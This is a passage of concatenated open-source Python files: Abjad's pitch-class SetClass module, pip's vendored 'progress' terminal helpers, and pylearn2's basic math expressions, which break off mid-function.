(9, 13): (0, 1, 2, 3, 5, 6, 7, 8, 9),
(9, 14): (0, 1, 2, 3, 5, 6, 7, 9, 10),
(9, 15): (0, 1, 2, 3, 5, 6, 8, 9, 10),
(9, 16): (0, 1, 2, 4, 5, 6, 7, 8, 9),
(9, 17): (0, 1, 2, 4, 5, 6, 8, 9, 10),
(9, 18): (0, 1, 3, 4, 5, 6, 7, 8, 9),
(9, 19): (0, 2, 3, 4, 5, 6, 7, 8, 9),
# 10
(10, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8, 10),
(10, 2): (0, 1, 2, 3, 4, 5, 6, 7, 8, 9),
(10, 3): (0, 1, 2, 3, 4, 5, 6, 7, 9, 10),
(10, 4): (0, 1, 2, 3, 4, 5, 6, 8, 9, 10),
(10, 5): (0, 1, 2, 3, 4, 5, 7, 8, 9, 10),
(10, 6): (0, 1, 2, 3, 4, 6, 7, 8, 9, 10),
# 11
(11, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10),
# 12
(12, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11),
}
# Sanity check on the table size: the transposition-only (SG1) catalog
# must contain exactly 352 set-classes.
assert len(_transposition_only_identifier_to_prime_form) == 352
# Inverse lookups: prime form (sorted tuple of pc numbers) -> (cardinality,
# rank) identifier pair, one per ranking system.
_prime_form_to_forte_identifier = {
    v: k for k, v in _forte_identifier_to_prime_form.items()
}
_prime_form_to_lex_identifier = {
    v: k for k, v in _lex_identifier_to_prime_form.items()
}
_prime_form_to_transposition_only_identifier = {
    v: k for k, v in _transposition_only_identifier_to_prime_form.items()
}
### INITIALIZER ###
def __init__(
    self, cardinality=1, rank=1, *, lex_rank=None, transposition_only=None
):
    # SG1 (transposition-only) ranks are already lexicographic, so asking
    # for transposition_only together with lex_rank=False is contradictory.
    if bool(transposition_only) and lex_rank is False:
        raise Exception("SG1 set-classes are always lex-rank.")
    cardinality = int(cardinality)
    assert 0 <= cardinality <= 12, repr(cardinality)
    self._cardinality = cardinality
    rank = int(rank)
    assert 1 <= rank, repr(rank)
    self._rank = rank
    # lex_rank and transposition_only are tri-state: None, True or False.
    assert isinstance(lex_rank, (type(None), type(True)))
    self._lex_rank = lex_rank
    assert isinstance(transposition_only, (type(None), type(True)))
    self._transposition_only = transposition_only
    # Resolve (cardinality, rank) to a prime form via the table selected by
    # the ranking flags; cached because it never changes after init.
    prime_form = self._unrank(
        self.cardinality,
        self.rank,
        transposition_only=self.transposition_only,
    )
    self._prime_form = prime_form
### SPECIAL METHODS ###
def __eq__(self, argument) -> bool:
    """
    Is true when all initialization values of Abjad value object equal
    the initialization values of ``argument``.
    """
    # Delegates to the shared value-object comparison helper.
    return StorageFormatManager.compare_objects(self, argument)
def __hash__(self) -> int:
    """
    Hashes Abjad value object.
    """
    # Hash the same initialization values used by __eq__ so equal objects
    # hash equal; surface unhashable members as a clearer TypeError.
    hash_values = StorageFormatManager(self).get_hash_values()
    try:
        result = hash(hash_values)
    except TypeError:
        raise TypeError(f"unhashable type: {self}")
    return result
def __repr__(self) -> str:
    """
    Gets interpreter representation.
    """
    return StorageFormatManager(self).get_repr_format()
def __str__(self):
    """
    Gets string representation.

    .. container:: example

        Gets string of SG2 set-class with Forte rank:

        >>> set_class = abjad.SetClass(4, 29)
        >>> print(set_class)
        SC(4-29){0, 1, 3, 7}

    .. container:: example

        Gets string of SG2 set-class with lex rank:

        >>> set_class = abjad.SetClass(
        ...     4, 29,
        ...     lex_rank=True,
        ...     )
        >>> print(set_class)
        SC(4-29){0, 3, 6, 9}

    .. container:: example

        Gets string of SG1 set-class:

        >>> set_class = abjad.SetClass(
        ...     4, 29,
        ...     transposition_only=True,
        ...     )
        >>> print(set_class)
        SC(4-29){0, 2, 6, 7}

    Returns string.
    """
    string = f"SC({self.cardinality}-{self.rank}){self.prime_form!s}"
    # Drop the "PC" marker — presumably part of PitchClassSet's string
    # rendering — so only the braced set remains (see doctests above).
    string = string.replace("PC", "")
    return string
### PRIVATE METHODS ###
@staticmethod
def _classify_set_classes():
    """
    Was only necessary to run during implementation of SetClass.

    Generated the ...

        _forte_identifier_to_prime_form
        _lex_identifier_to_prime_form
        _transposition_only_identifier_to_prime_form

    ... dictionaries attached as class attributes.

    Archived here in case other identifier systems are needed in future.
    """
    # Collect distinct prime forms, bucketed by cardinality.
    all_prime_forms = {}
    for cardinality in range(12 + 1):
        all_prime_forms[cardinality] = set()
    for pc_set in SetClass._yield_all_pitch_class_sets():
        # Skip nonempty sets that do not contain pc 0 (the empty set is
        # kept) — presumably to cut down redundant transpositions before
        # prime-form reduction; TODO confirm intent.
        if NumberedPitchClass(0) not in pc_set:
            if 0 < len(pc_set):
                continue
        prime_form = pc_set.get_prime_form(transposition_only=True)
        all_prime_forms[prime_form.cardinality].add(prime_form)
    total = 0
    for cardinality in range(12 + 1):
        count = len(all_prime_forms[cardinality])
        total += count
    # Print the table source: lex-sorted prime forms per cardinality, as
    # "(cardinality, rank): (pcs...)" lines ready to paste into the dicts.
    for cardinality in range(12 + 1):
        prime_forms = list(all_prime_forms[cardinality])
        prime_forms.sort(key=lambda x: str(x))
        for index, prime_form in enumerate(prime_forms):
            rank = index + 1
            prime_form = str(prime_form)
            prime_form = prime_form.replace("{", "(")
            prime_form = prime_form.replace("}", ")")
            message = f"({cardinality}, {rank}): {prime_form},"
            print(message)
        print()
    message = f"total set-classes: {total}"
    print(message)
    print()
def _unrank(self, cardinality, rank, transposition_only=None):
    # NOTE(review): the ``transposition_only`` parameter is currently
    # unused — the lookup table is chosen from ``self.transposition_only``
    # and ``self.lex_rank``. The only caller (__init__) passes
    # transposition_only=self.transposition_only, so behavior matches.
    pair = (cardinality, rank)
    if self.transposition_only:
        prime_form = self._transposition_only_identifier_to_prime_form[pair]
    elif self.lex_rank:
        prime_form = self._lex_identifier_to_prime_form[pair]
    else:
        prime_form = self._forte_identifier_to_prime_form[pair]
    # Wrap the raw pc-number tuple in a numbered pitch-class set.
    prime_form = PitchClassSet(items=prime_form, item_class=NumberedPitchClass)
    return prime_form
@staticmethod
def _yield_all_pitch_class_sets():
    # Enumerate every subset of the 12 pitch classes by treating each
    # integer in [0, 4096) as a 12-bit membership mask: bit i (reading the
    # reversed binary string) marks pitch class i as present.
    for mask in range(4096):
        bits = math.integer_to_binary_string(mask).zfill(12)
        reversed_bits = "".join(reversed(bits))
        members = [index for index, bit in enumerate(reversed_bits) if bit == "1"]
        yield PitchClassSet(members, item_class=NumberedPitchClass)
### PUBLIC PROPERTIES ###
@property
def cardinality(self):
    """
    Gets cardinality.

    .. container:: example

        Gets cardinality of SG2 set-class with Forte rank:

        >>> set_class = abjad.SetClass(4, 29)
        >>> print(set_class)
        SC(4-29){0, 1, 3, 7}

        >>> set_class.cardinality
        4

    .. container:: example

        Gets cardinality of SG2 set-class with lex rank:

        >>> set_class = abjad.SetClass(
        ...     4, 29,
        ...     lex_rank=True,
        ...     )
        >>> print(set_class)
        SC(4-29){0, 3, 6, 9}

        >>> set_class.cardinality
        4

    .. container:: example

        Gets cardinality of SG1 set-class:

        >>> set_class = abjad.SetClass(
        ...     4, 29,
        ...     transposition_only=True,
        ...     )
        >>> print(set_class)
        SC(4-29){0, 2, 6, 7}

        >>> set_class.cardinality
        4

    Set to integer between 0 and 12, inclusive.

    Returns integer between 0 and 12, inclusive.
    """
    return self._cardinality
@property
def is_inversion_equivalent(self):
    """
    Is true when set-class is inversion-equivalent.

    .. container:: example

        Is inversion-equivalent:

        >>> set_class = abjad.SetClass(4, 29)
        >>> print(set_class)
        SC(4-29){0, 1, 3, 7}

        >>> pitch_class_set = set_class.prime_form
        >>> inverted_pitch_class_set = pitch_class_set.invert()
        >>> inverted_set_class = abjad.SetClass.from_pitch_class_set(
        ...     inverted_pitch_class_set
        ...     )
        >>> print(inverted_set_class)
        SC(4-29){0, 1, 3, 7}

        >>> set_class.is_inversion_equivalent
        True

    .. container:: example

        Is inversion-equivalent:

        >>> set_class = abjad.SetClass(
        ...     4, 29,
        ...     lex_rank=True,
        ...     )
        >>> print(set_class)
        SC(4-29){0, 3, 6, 9}

        >>> pitch_class_set = set_class.prime_form
        >>> inverted_pitch_class_set = pitch_class_set.invert()
        >>> inverted_set_class = abjad.SetClass.from_pitch_class_set(
        ...     inverted_pitch_class_set,
        ...     lex_rank=True,
        ...     )
        >>> print(inverted_set_class)
        SC(4-29){0, 3, 6, 9}

        >>> set_class.is_inversion_equivalent
        True

    .. container:: example

        Is not inversion-equivalent:

        >>> set_class = abjad.SetClass(
        ...     4, 29,
        ...     transposition_only=True,
        ...     )
        >>> print(set_class)
        SC(4-29){0, 2, 6, 7}

        >>> pitch_class_set = set_class.prime_form
        >>> inverted_pitch_class_set = pitch_class_set.invert()
        >>> inverted_set_class = abjad.SetClass.from_pitch_class_set(
        ...     inverted_pitch_class_set,
        ...     transposition_only=True,
        ...     )
        >>> print(inverted_set_class)
        SC(4-15){0, 1, 5, 7}

        >>> set_class.is_inversion_equivalent
        False

    Returns true or false.
    """
    # Invert the prime form, classify the inversion under the same ranking
    # flags, and compare: equality means the class is closed under inversion.
    prime_form = self.prime_form
    inverted_pitch_class_set = prime_form.invert()
    inverted_set_class = type(self).from_pitch_class_set(
        inverted_pitch_class_set,
        lex_rank=self.lex_rank,
        transposition_only=self.transposition_only,
    )
    return self == inverted_set_class
@property
def lex_rank(self):
    """
    Is true when set-class uses lex rank.

    .. container:: example

        Uses Forte rank:

        >>> set_class = abjad.SetClass(4, 29)
        >>> set_class
        SetClass(cardinality=4, rank=29)

        >>> print(set_class)
        SC(4-29){0, 1, 3, 7}

    .. container:: example

        Uses lex rank:

        >>> set_class = abjad.SetClass(
        ...     4, 29,
        ...     lex_rank=True,
        ...     )
        >>> set_class
        SetClass(cardinality=4, rank=29, lex_rank=True)

        >>> print(set_class)
        SC(4-29){0, 3, 6, 9}

    .. container:: example

        SG1 set-classes always use lex rank:

        >>> set_class = abjad.SetClass(
        ...     4, 29,
        ...     transposition_only=True,
        ...     )
        >>> set_class
        SetClass(cardinality=4, rank=29, transposition_only=True)

        >>> print(set_class)
        SC(4-29){0, 2, 6, 7}

    Set to true, false or none.

    Defaults to none.

    Returns true, false or none.
    """
    return self._lex_rank
@property
def prime_form(self):
    """
    Gets prime form.

    .. container:: example

        Gets prime form of SG2 set-class with Forte rank:

        >>> set_class = abjad.SetClass(4, 29)
        >>> print(set_class)
        SC(4-29){0, 1, 3, 7}

        >>> set_class.prime_form
        PitchClassSet([0, 1, 3, 7])

    .. container:: example

        Gets prime form of SG2 set-class with lex rank:

        >>> set_class = abjad.SetClass(
        ...     4, 29,
        ...     lex_rank=True,
        ...     )
        >>> print(set_class)
        SC(4-29){0, 3, 6, 9}

        >>> set_class.prime_form
        PitchClassSet([0, 3, 6, 9])

    .. container:: example

        Gets prime form of SG1 set-class:

        >>> set_class = abjad.SetClass(
        ...     4, 29,
        ...     transposition_only=True,
        ...     )
        >>> print(set_class)
        SC(4-29){0, 2, 6, 7}

        >>> set_class.prime_form
        PitchClassSet([0, 2, 6, 7])

    Returns numbered pitch-class set.
    """
    # Computed once in __init__ via _unrank; immutable thereafter.
    return self._prime_form
@property
def rank(self):
    """
    Gets rank.

    .. container:: example

        Gets rank of SG2 set-class with Forte rank:

        >>> set_class = abjad.SetClass(4, 29)
        >>> print(set_class)
        SC(4-29){0, 1, 3, 7}

        >>> set_class.rank
        29

    .. container:: example

        Gets rank of SG2 set-class with lex rank:

        >>> set_class = abjad.SetClass(
        ...     4, 29,
        ...     lex_rank=True,
        ...     )
        >>> print(set_class)
        SC(4-29){0, 3, 6, 9}

        >>> set_class.rank
        29

    .. container:: example

        Gets rank of SG1 set-class:

        >>> set_class = abjad.SetClass(
        ...     4, 29,
        ...     transposition_only=True,
        ...     )
        >>> print(set_class)
        SC(4-29){0, 2, 6, 7}

        >>> set_class.rank
        29

    Set to positive integer.

    Returns positive integer.
    """
    return self._rank
@property
def transposition_only(self):
    """
    Is true when set-class collects pitch-class sets related only by
    transposition.

    .. container:: example

        Initializes SG2 set-class with Forte rank:

        >>> set_class = abjad.SetClass(4, 29)
        >>> print(set_class)
        SC(4-29){0, 1, 3, 7}

    .. container:: example

        Initializes SG2 set-class with lex rank:

        >>> set_class = abjad.SetClass(
        ...     4, 29,
        ...     lex_rank=True,
        ...     )
        >>> print(set_class)
        SC(4-29){0, 3, 6, 9}

    .. container:: example

        Initializes SG1 set-class:

        >>> set_class = abjad.SetClass(
        ...     4, 29,
        ...     transposition_only=True,
        ...     )
        >>> print(set_class)
        SC(4-29){0, 2, 6, 7}

    Set to true, false or none.

    Defaults to none.

    Returns true, false or none.
    """
    return self._transposition_only
### PUBLIC METHODS ###
# TODO: change to from_selection()
@staticmethod
def from_pitch_class_set(pitch_class_set, lex_rank=None, transposition_only=None):
    """
    Makes set-class from ``pitch_class_set``.

    .. container:: example

        >>> pc_set = abjad.PitchClassSet([9, 0, 3, 5, 6])
        >>> print(abjad.SetClass.from_pitch_class_set(pc_set))
        SC(5-31){0, 1, 3, 6, 9}

        >>> print(abjad.SetClass.from_pitch_class_set(pc_set, lex_rank=True))
        SC(5-22){0, 1, 3, 6, 9}

        >>> print(abjad.SetClass.from_pitch_class_set(
        ...     pc_set, transposition_only=True))
        SC(5-44){0, 2, 3, 6, 9}

    Returns set-class.
    """
    # Normalize the input to a numbered pitch-class set and reduce it to
    # its prime form under the requested equivalence.
    normalized = PitchClassSet(items=pitch_class_set, item_class=NumberedPitchClass)
    prime = normalized.get_prime_form(transposition_only=transposition_only)
    # The sorted tuple of pc numbers keys the inverse identifier tables.
    key = tuple(pc.number for pc in sorted(prime))
    if transposition_only:
        identifier_map = SetClass._prime_form_to_transposition_only_identifier
    elif lex_rank:
        identifier_map = SetClass._prime_form_to_lex_identifier
    else:
        identifier_map = SetClass._prime_form_to_forte_identifier
    cardinality, rank = identifier_map[key]
    return SetClass(
        cardinality=cardinality,
        rank=rank,
        lex_rank=lex_rank,
        transposition_only=transposition_only,
    )
@staticmethod
def list_set_classes(cardinality=None, lex_rank=None, transposition_only=None):
    """
    List set-classes.

    .. container:: example

        Lists SG2 set-classes of cardinality 4 with Forte rank:

        >>> set_classes = abjad.SetClass.list_set_classes(
        ...     cardinality=4,
        ...     )
        >>> for set_class in set_classes:
        ...     print(set_class)
        SC(4-1){0, 1, 2, 3}
        SC(4-2){0, 1, 2, 4}
        SC(4-3){0, 1, 3, 4}
        SC(4-4){0, 1, 2, 5}
        SC(4-5){0, 1, 2, 6}
        SC(4-6){0, 1, 2, 7}
        SC(4-7){0, 1, 4, 5}
        SC(4-8){0, 1, 5, 6}
        SC(4-9){0, 1, 6, 7}
        SC(4-10){0, 2, 3, 5}
        SC(4-11){0, 1, 3, 5}
        SC(4-12){0, 2, 3, 6}
        SC(4-13){0, 1, 3, 6}
        SC(4-14){0, 2, 3, 7}
        SC(4-15){0, 1, 4, 6}
        SC(4-16){0, 1, 5, 7}
        SC(4-17){0, 3, 4, 7}
        SC(4-18){0, 1, 4, 7}
        SC(4-19){0, 1, 4, 8}
        SC(4-20){0, 1, 5, 8}
        SC(4-21){0, 2, 4, 6}
        SC(4-22){0, 2, 4, 7}
        SC(4-23){0, 2, 5, 7}
        SC(4-24){0, 2, 4, 8}
        SC(4-25){0, 2, 6, 8}
        SC(4-26){0, 3, 5, 8}
        SC(4-27){0, 2, 5, 8}
        SC(4-28){0, 3, 6, 9}
        SC(4-29){0, 1, 3, 7}

    .. container:: example

        Lists SG2 set-classes of cardinality 4 with lex rank:

        >>> set_classes = abjad.SetClass.list_set_classes(
        ...     cardinality=4,
        ...     lex_rank=True,
        ...     )
        >>> for set_class in set_classes:
        ...     print(set_class)
        SC(4-1){0, 1, 2, 3}
        SC(4-2){0, 1, 2, 4}
        SC(4-3){0, 1, 2, 5}
        SC(4-4){0, 1, 2, 6}
        SC(4-5){0, 1, 2, 7}
        SC(4-6){0, 1, 3, 4}
        SC(4-7){0, 1, 3, 5}
        SC(4-8){0, 1, 3, 6}
        SC(4-9){0, 1, 3, 7}
        SC(4-10){0, 1, 4, 5}
        SC(4-11){0, 1, 4, 6}
        SC(4-12){0, 1, 4, 7}
        SC(4-13){0, 1, 4, 8}
        SC(4-14){0, 1, 5, 6}
        SC(4-15){0, 1, 5, 7}
        SC(4-16){0, 1, 5, 8}
        SC(4-17){0, 1, 6, 7}
        SC(4-18){0, 2, 3, 5}
        SC(4-19){0, 2, 3, 6}
        SC(4-20){0, 2, 3, 7}
        SC(4-21){0, 2, 4, 6}
        SC(4-22){0, 2, 4, 7}
        SC(4-23){0, 2, 4, 8}
        SC(4-24){0, 2, 5, 7}
        SC(4-25){0, 2, 5, 8}
        SC(4-26){0, 2, 6, 8}
        SC(4-27){0, 3, 4, 7}
        SC(4-28){0, 3, 5, 8}
        SC(4-29){0, 3, 6, 9}

    .. container:: example

        Lists SG1 set-classes of cardinality 4:

        >>> set_classes = abjad.SetClass.list_set_classes(
        ...     cardinality=4,
        ...     transposition_only=True,
        ...     )
        >>> for set_class in set_classes:
        ...     print(set_class)
        SC(4-1){0, 1, 2, 3}
        SC(4-2){0, 1, 2, 4}
        SC(4-3){0, 1, 2, 5}
        SC(4-4){0, 1, 2, 6}
        SC(4-5){0, 1, 2, 7}
        SC(4-6){0, 1, 3, 4}
        SC(4-7){0, 1, 3, 5}
        SC(4-8){0, 1, 3, 6}
        SC(4-9){0, 1, 3, 7}
        SC(4-10){0, 1, 4, 5}
        SC(4-11){0, 1, 4, 6}
        SC(4-12){0, 1, 4, 7}
        SC(4-13){0, 1, 4, 8}
        SC(4-14){0, 1, 5, 6}
        SC(4-15){0, 1, 5, 7}
        SC(4-16){0, 1, 5, 8}
        SC(4-17){0, 1, 6, 7}
        SC(4-18){0, 2, 3, 4}
        SC(4-19){0, 2, 3, 5}
        SC(4-20){0, 2, 3, 6}
        SC(4-21){0, 2, 3, 7}
        SC(4-22){0, 2, 4, 5}
        SC(4-23){0, 2, 4, 6}
        SC(4-24){0, 2, 4, 7}
        SC(4-25){0, 2, 4, 8}
        SC(4-26){0, 2, 5, 6}
        SC(4-27){0, 2, 5, 7}
        SC(4-28){0, 2, 5, 8}
        SC(4-29){0, 2, 6, 7}
        SC(4-30){0, 2, 6, 8}
        SC(4-31){0, 3, 4, 5}
        SC(4-32){0, 3, 4, 6}
        SC(4-33){0, 3, 4, 7}
        SC(4-34){0, 3, 4, 8}
        SC(4-35){0, 3, 5, 6}
        SC(4-36){0, 3, 5, 7}
        SC(4-37){0, 3, 5, 8}
        SC(4-38){0, 3, 6, 7}
        SC(4-39){0, 3, 6, 8}
        SC(4-40){0, 3, 6, 9}
        SC(4-41){0, 4, 5, 6}
        SC(4-42){0, 4, 5, 7}
        SC(4-43){0, 4, 6, 7}

    Returns list of set-classes.
    """
    # Pick the identifier table matching the requested ranking system.
    if transposition_only:
        identifiers = SetClass._transposition_only_identifier_to_prime_form
    elif lex_rank:
        identifiers = SetClass._lex_identifier_to_prime_form
    else:
        identifiers = SetClass._forte_identifier_to_prime_form
    # Keys are (cardinality, rank) pairs; optionally filter by cardinality.
    identifiers = list(identifiers)
    if cardinality is not None:
        identifiers = [_ for _ in identifiers if _[0] == cardinality]
    set_classes = []
    for identifier in sorted(identifiers):
        cardinality, rank = identifier
        set_class = SetClass(
            cardinality,
            rank,
            lex_rank=lex_rank,
            transposition_only=transposition_only,
        )
        set_classes.append(set_class)
    return set_classes
| gpl-3.0 |
Conflei/ATI | [ATI] Misfenterest/Frontend/venv/lib/python2.6/site-packages/pip/_vendor/progress/helpers.py | 404 | 2894 | # Copyright (c) 2012 Giorgos Verigakis <verigak@gmail.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from __future__ import print_function
from __future__ import unicode_literals
HIDE_CURSOR = '\x1b[?25l'
SHOW_CURSOR = '\x1b[?25h'
class WriteMixin(object):
    """Mixin that repaints a single in-place status string on a tty.

    NOTE(review): ``self.file`` (and usually ``self.message``) are expected
    to be provided by the progress class this mixin is combined with —
    confirm against the consuming class.
    """
    # Subclasses may set True to hide the terminal cursor while running.
    hide_cursor = False

    def __init__(self, message=None, **kwargs):
        super(WriteMixin, self).__init__(**kwargs)
        # Widest string written so far; used to backspace over and pad out
        # previous output.
        self._width = 0
        if message:
            self.message = message

        if self.file.isatty():
            if self.hide_cursor:
                print(HIDE_CURSOR, end='', file=self.file)
            print(self.message, end='', file=self.file)
            self.file.flush()

    def write(self, s):
        # Backspace over the previous text, then overwrite it; ljust pads a
        # shorter string so it fully erases a longer previous one.
        if self.file.isatty():
            b = '\b' * self._width
            c = s.ljust(self._width)
            print(b + c, end='', file=self.file)
            self._width = max(self._width, len(s))
            self.file.flush()

    def finish(self):
        # Restore the cursor if we hid it at construction time.
        if self.file.isatty() and self.hide_cursor:
            print(SHOW_CURSOR, end='', file=self.file)
class WritelnMixin(object):
    """Mixin that rewrites a whole terminal line (clear + reprint) per update.

    NOTE(review): ``self.file`` is expected to be provided by the progress
    class this mixin is combined with — confirm against the consuming class.
    """
    # Subclasses may set True to hide the terminal cursor while running.
    hide_cursor = False

    def __init__(self, message=None, **kwargs):
        super(WritelnMixin, self).__init__(**kwargs)
        if message:
            self.message = message

        if self.file.isatty() and self.hide_cursor:
            print(HIDE_CURSOR, end='', file=self.file)

    def clearln(self):
        # '\r' returns to column 0; the ANSI sequence ESC[K erases from the
        # cursor to the end of the line.
        if self.file.isatty():
            print('\r\x1b[K', end='', file=self.file)

    def writeln(self, line):
        if self.file.isatty():
            self.clearln()
            print(line, end='', file=self.file)
            self.file.flush()

    def finish(self):
        # Move to the next line and restore the cursor if it was hidden.
        if self.file.isatty():
            print(file=self.file)
            if self.hide_cursor:
                print(SHOW_CURSOR, end='', file=self.file)
from signal import signal, SIGINT
from sys import exit
class SigIntMixin(object):
    """Registers a signal handler that calls finish on SIGINT"""

    def __init__(self, *args, **kwargs):
        super(SigIntMixin, self).__init__(*args, **kwargs)
        # Installed at construction time; replaces any previously installed
        # SIGINT handler for the whole process.
        signal(SIGINT, self._sigint_handler)

    def _sigint_handler(self, signum, frame):
        # Let the progress display clean up (cursor, newline), then exit 0.
        self.finish()
        exit(0)
| mit |
lamblin/pylearn2 | pylearn2/expr/basic.py | 39 | 9028 | """
Very simple and basic mathematical expressions used often throughout the library.
"""
__authors__ = "Ian Goodfellow and Razvan Pascanu"
__copyright__ = "Copyright 2013, Universite de Montreal"
__credits__ = ["Ian Goodfellow and Razvan Pascanu"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
__email__ = "pylearn-dev@googlegroups"
import numpy as np
import theano.tensor as T
import warnings
from pylearn2.blocks import Block
from pylearn2.utils import as_floatX, constantX
def numpy_norms(W):
    """
    Returns a vector containing the L2 norm of each column of ``W``,
    where ``W`` and the return value are numpy ndarrays.

    A small epsilon (1e-8) is added under the square root for numerical
    stability on all-zero columns.
    """
    squared_column_sums = (W ** 2).sum(axis=0)
    return np.sqrt(1e-8 + squared_column_sums)
def theano_norms(W):
    """
    Returns a vector containing the L2 norm of each column of ``W``,
    where ``W`` and the return value are symbolic theano variables.
    """
    # Epsilon under the square root keeps the value (and gradient) finite
    # for all-zero columns; as_floatX casts it to the configured dtype.
    return T.sqrt(as_floatX(1e-8)+T.sqr(W).sum(axis=0))
def full_min(var):
    """
    Returns a symbolic expression for the value of the minimal element of
    symbolic tensor ``var``. (T.min does something else as of the time of
    this writing.)
    """
    # Reduce over every axis so the result is a scalar.
    return var.min(axis=range(0,len(var.type.broadcastable)))
def full_max(var):
    """
    Returns a symbolic expression for the value of the maximal element of
    a symbolic tensor. (T.max does something else as of the time of this
    writing.)
    """
    # Reduce over every axis so the result is a scalar.
    return var.max(axis=range(0,len(var.type.broadcastable)))
def multiple_switch(*args):
    """
    Applies a cascade of ``T.switch`` ops, evaluating like an
    if/elif/.../else chain:

    .. code-block:: none

        if args[0]:   args[1]
        elif args[2]: args[3]
        ...
        else:         args[-1]

    Expects an odd number of arguments (at least 3): condition/value
    pairs followed by a final fallback value.
    """
    # Base case: a single (condition, then, else) triple.
    if len(args) == 3:
        return T.switch(*args)
    # Recursive case: the tail of the chain becomes the else-branch.
    return T.switch(args[0], args[1], multiple_switch(*args[2:]))
def symGivens2(a, b):
    """
    Stable Symmetric Givens rotation plus reflection

    Parameters
    ----------
    a : theano scalar
        first element of a two-vector  [a; b]
    b : theano scalar
        second element of a two-vector [a; b]

    Returns
    -------
    c : WRITEME
        cosine(theta), where theta is the implicit angle of
        rotation (counter-clockwise) in a plane-rotation
    s : WRITEME
        sine(theta)
    d : WRITEME
        two-norm of [a; b]

    Notes
    -----
    * See also:

      - Algorithm 4.9, stable *unsymmetric* Givens rotations in Golub
        and van Loan's book Matrix Computations, 3rd edition.
      - MATLAB's function PLANEROT.

    * This method gives c and s such that

      .. math::

          \\begin{pmatrix} c & s \\\\ s & -c \\end{pmatrix}
          \\begin{pmatrix} a \\\\ b \\end{pmatrix} =
          \\begin{pmatrix} d \\\\ 0 \\end{pmatrix}

      where
      :math:`d = \\left\Vert \\begin{pmatrix} a \\\\ b \\end{pmatrix}
      \\right\Vert _{2}`,
      :math:`c = a / \sqrt{a^2 + b^2} = a / d`,
      :math:`s = b / \sqrt{a^2 + b^2} = b / d`.
      The implementation guards against overflow in computing
      :math:`\sqrt{a^2 + b^2}`.

    * Observation: Implementing this function as a single op in C might
      improve speed considerably .
    """
    # Each of c, s, d is built as a nest of T.switch branches keyed on which
    # of |a|, |b| dominates, so that the ratio fed to sqrt(1 + r**2) is
    # always <= 1 in magnitude (the overflow guard mentioned above).
    c_branch1 = T.switch(T.eq(a, constantX(0)),
                         constantX(1),
                         T.sgn(a))
    c_branch21 = (a / b) * T.sgn(b) / \
        T.sqrt(constantX(1) + (a / b) ** 2)
    c_branch22 = T.sgn(a) / T.sqrt(constantX(1) + (b / a) ** 2)

    c_branch2 = T.switch(T.eq(a, constantX(0)),
                         constantX(0),
                         T.switch(T.gt(abs(b), abs(a)),
                                  c_branch21,
                                  c_branch22))
    c = T.switch(T.eq(b, constantX(0)),
                 c_branch1,
                 c_branch2)

    s_branch1 = T.sgn(b) / T.sqrt(constantX(1) + (a / b) ** 2)
    s_branch2 = (b / a) * T.sgn(a) / T.sqrt(constantX(1) + (b / a) ** 2)
    s = T.switch(T.eq(b, constantX(0)),
                 constantX(0),
                 T.switch(T.eq(a, constantX(0)),
                          T.sgn(b),
                          T.switch(T.gt(abs(b), abs(a)),
                                   s_branch1,
                                   s_branch2)))

    d_branch1 = b / (T.sgn(b) / T.sqrt(constantX(1) + (a / b) ** 2))
    d_branch2 = a / (T.sgn(a) / T.sqrt(constantX(1) + (b / a) ** 2))
    d = T.switch(T.eq(b, constantX(0)),
                 abs(a),
                 T.switch(T.eq(a, constantX(0)),
                          abs(b),
                          T.switch(T.gt(abs(b), abs(a)),
                                   d_branch1,
                                   d_branch2)))
    return c, s, d
def sqrt_inner_product(xs, ys=None):
    """
    Computes the square root of the inner product between ``xs`` and
    ``ys`` — equivalently, the norm of the vector obtained by flattening
    and concatenating all tensors in ``xs`` against the matching vector
    from ``ys``. When ``ys`` is None, computes the norm of ``xs`` with
    itself. ``ys``, when given, must match ``xs`` element-wise.

    Parameters
    ----------
    xs : list of theano expressions
    ys : None or list of theano expressions, optional
    """
    if ys is None:
        ys = list(xs)
    total = sum((x * y).sum() for x, y in zip(xs, ys))
    return T.sqrt(total)
def inner_product(xs, ys=None):
    """
    Computes the inner product between ``xs`` and ``ys`` — equivalently,
    the dot product of the vectors obtained by flattening and
    concatenating all tensors in ``xs`` and in ``ys``. When ``ys`` is
    None, computes the squared norm of ``xs`` with itself. ``ys``, when
    given, must match ``xs`` element-wise.

    Parameters
    ----------
    xs : list of theano expressions
    ys : None or list of theano expressions, optional
    """
    if ys is None:
        ys = list(xs)
    total = 0
    for x, y in zip(xs, ys):
        total = total + (x * y).sum()
    return total
def is_binary(x):
    """
    Returns true when every element of ``x`` equals 0 or 1.
    """
    return np.all(np.logical_or(x == 0, x == 1))
def log_sum_exp(A=None, axis=None, log_A=None):
    """
    A numerically stable expression for
    `T.log(T.exp(A).sum(axis=axis))`

    Parameters
    ----------
    A : theano.gof.Variable
        A tensor we want to compute the log sum exp of
    axis : int, optional
        Axis along which to sum
    log_A : deprecated
        `A` used to be named `log_A`. We are removing the `log_A`
        interface because there is no need for the input to be
        the output of theano.tensor.log. The only change is the
        renaming, i.e. the value of log_sum_exp(log_A=foo) has
        not changed, and log_sum_exp(A=foo) is equivalent to
        log_sum_exp(log_A=foo).

    Returns
    -------
    log_sum_exp : theano.gof.Variable
        The log sum exp of `A`
    """
    if log_A is not None:
        assert A is None
        warnings.warn("log_A is deprecated, and will be removed on or"
                      "after 2015-08-09. Switch to A")
        A = log_A
        del log_A
    # Standard log-sum-exp trick: subtract the per-axis max before
    # exponentiating so exp never overflows, then add it back after the log.
    A_max = T.max(A, axis=axis, keepdims=True)
    B = (
